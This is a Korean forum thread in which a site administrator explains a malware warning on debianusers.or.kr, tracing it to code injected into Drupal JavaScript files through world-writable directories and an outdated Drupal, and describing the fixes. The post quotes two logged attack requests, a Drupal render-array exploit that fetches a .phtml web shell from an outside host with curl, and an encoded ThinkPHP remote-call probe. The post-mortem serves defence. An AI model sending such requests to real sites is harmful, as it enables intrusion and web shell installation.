멀웨어가 있습니다 라고 나오네요?

Submitted by 세벌 on 2019.11.14.(Thu) - 12:26

debianusers.or.kr 들어갈 때

멀웨어가  있다고  경고가 뜨네요. 화면 캡처 붙임.

어떨 때는 안 나기도 하고...

사이트 문제인지 다른 문제인지 모르겠습니다.

westporch

작성: 2019.11.16.(Sat) - 23:59

수정: 2019.11.16.(Sat) - 23:59

안녕하십니까?

드루팔에서 사용되는 자바스크립트 파일(2개)의, 맨 마지막 줄에 악성코드가 삽입되어 있었습니다. 이 악성코드를 삭제하였으며, 드루팔(코어)과 드루팔의 모듈(8개)들을 모두 최신 버전으로 업데이트했습니다. 그러므로 안심하고 데비안유저스(debianusers.or.kr)에 접속하셔도 됩니다.

저도 크롬 브라우저(PC, 모바일)로 데비안유저스에 접속했는데, 저는 왜 '멀웨어 경고'가 한 번도 발생하지 않았는지 모르겠습니다. 세벌 님 덕분에 악성코드를 제거할 수 있었습니다.

정말 고맙습니다.

자세한 내용은 아래에 기록하였습니다.

 

■ 멀웨어 경고가 출력된 이유
드루팔과 관련된 자바스크립트 파일(2개)의 맨 마지막 줄에 악성코드가 삽입되어 있었습니다.  이로 인해 크롬 브라우저로 데비안유저스에 접속할 때 '멀웨어 경고'가 발생하였습니다.

■ 현재 데비안유저스는 안전한가?
악성코드는 삭제되었으니 안심하고 데비안유저스에 접속하셔도 됩니다.

■ 악성코드 공격을 당한 이유
▲디렉터리 권한 설정 문제  ▲드루팔 업데이트 미적용 때문에, 악성코드 공격을 당한 것으로 보입니다.

시스템의 로그를 살펴보았지만, 공격을 당한 '정확한 이유'는 모르겠습니다. 다만 공격자가 리눅스 서버의 계정을 탈취하지 않고, 드루팔의 취약점만을 이용해서 자바스크립트 파일에 악성코드를 삽입한 것으로 보입니다. 이에 대한 근거는 다음과 같습니다.  

첫째, 드루팔의 파일 디렉터리(sites/default/files), 권한을 777로 설정했기 때문에 보안에 취약했습니다.

악성코드 문제가 있다는 것을 인지한 후에, 서버에 접속한 후 find 명령어로 최근에 변경된 파일을 검색해보니, sites/default/files에 있는 파일들만 변경되었음을 확인할 수 있었습니다.

파일 디렉터리의 취약점을 노린 공격 시도가 다음과 같이, 웹 서버(nginx)의 로그(access.log)에 기록되었습니다.

128.131.132.143 - - [15/Nov/2019:02:38:17 +0900] "POST 
//?q=user/password&name[%23post_render][]=passthru&name[%23type]=mar
kup&name[%23markup]=mv+sites/default/files/.htaccess+htaccessx;curl+
-o+sites/default/files/renata.phtml+'http://jfgsolutions.ca/renata.p
html' HTTP/1.1" 302 1468 "-" "libwww-perl/6.15"

물론 이뿐만 아니라, 다음과 같이 의심스러운 공격도 웹서버의 로그에 기록되었습니다.

27.254.158.129 - - [12/Nov/2019:16:09:04 +0900] "GET /index.php?s=%2
f%69%6e%64%65%78%2f%5c%74%68%69%6e%6b%5c%61%70%70%2f%69%6e%76%6f%6b%
65%66%75%6e%63%74%69%6f%6e&function=%63%61%6c%6c%5f%75%73%65%72%5f%6
6%75%6e%63%5f%61%72%72%61%79&vars[0]=%6d%645&vars[1][]=%48%65%6c%6c%
6f%54%68%69%6e%6b%50%48%50 HTTP/1.1" 404 571 "-" "Mozilla/5.0 (Windo
ws NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome
/64.0.3282.140 Safari/537.36"


둘째, 드루팔을 최신 버전으로 업데이트하지 않았기 때문에 보안에 취약했습니다.


■ 후속 조치
첫째, 드루팔의 파일 디렉터리(sites/default/files), 권한을 755로 변경하였습니다.

둘째, 드루팔을 최신 버전으로 업데이트하였습니다.

기존 드루팔의 버전(v8.2.7)을 최신 버전(v8.7.10)으로 업데이트했습니다. 또한 드루팔에서 사용하는 모듈들을 모두 최신 버전으로 업데이트하였습니다.

■ 반성
제가 드루팔의 업데이트에 소홀했습니다. 예전에 드루팔을 업데이트하다가 실패한 경험이 있어서, 드루팔을 업데이트하다가 서버를 망가뜨릴까 봐 두려웠습니다. 그래서 드루팔을 최신 버전으로 업데이트하지 않았습니다. 하지만 이번에는 피하지 않고, 드루팔을 성공적으로 업데이트했습니다.

제 노트북에 데비안유저스와 동일한 서버 환경을 구축하여, 드루팔 및 드루팔의 모듈을 최신 버전으로 업데이트하는 것을 테스트했습니다. 드루팔을 최신 버전으로 성공적으로 업데이트하는 것을 3번 해보고, 작업 계획서를 작성하여 11분 만에 드루팔을 최신 버전으로 업데이트하였습니다. 드루팔 모듈 업데이트는 1번 성공적으로 해 본 후에, 작업 계획서를 작성하여 7개의 모듈을 15분 만에 성공적으로 업데이트하였습니다.(드루팔 모듈은 총 8개를 사용하지만, 이 8개 중 1개는 드루팔 업데이트 시에 자동으로 업데이트됨.)

앞으로는 이 경험을 바탕으로, 드루팔 업데이트에 좀 더 신경쓰도록 하겠습니다.

■ 맺음말
데비안유저스에 '멀웨어 경고'가 있다는 글을 금요일(11월 15일 22시 40분쯤)에 읽고, 눈앞이 아찔했습니다. '오늘 잠을 못 자는 건가?', '내가 이걸 어떻게 해결하지?', '크로스사이트 스크립트 공격인가?', '내일 도서관은 못 가는 건가?' 여러 가지 생각이 들었습니다. 도무지 해결 방법이 보이지 않아서, 일단 토요일(11월 16일 01시쯤)에 잠을 자고 새벽(05시 30분쯤)에 일어나서, 온종일 컴퓨터 앞에 앉아 작업했습니다. '포기하고 싶다.', '울고 싶다.', '악성코드를 삽입한 사람이 진짜 얄밉다.' 수없이 많은 생각을 했습니다.

하지만 해결할 수 없을 것 같던 문제를 해결하고, 드루팔도 최신 버전으로 업데이트해서 뿌듯합니다. 한편으로는 제가 지금은 공시생이라, 데비안유저스에 신경을 많이 쓰지 못해서, 마음이 무겁기도 합니다. 제가 부족한 점이 많아서, 종종 서버에 문제가 발생할 때도 있지만 너그럽게 봐주시면 고맙겠습니다.

고맙습니다.

File attachments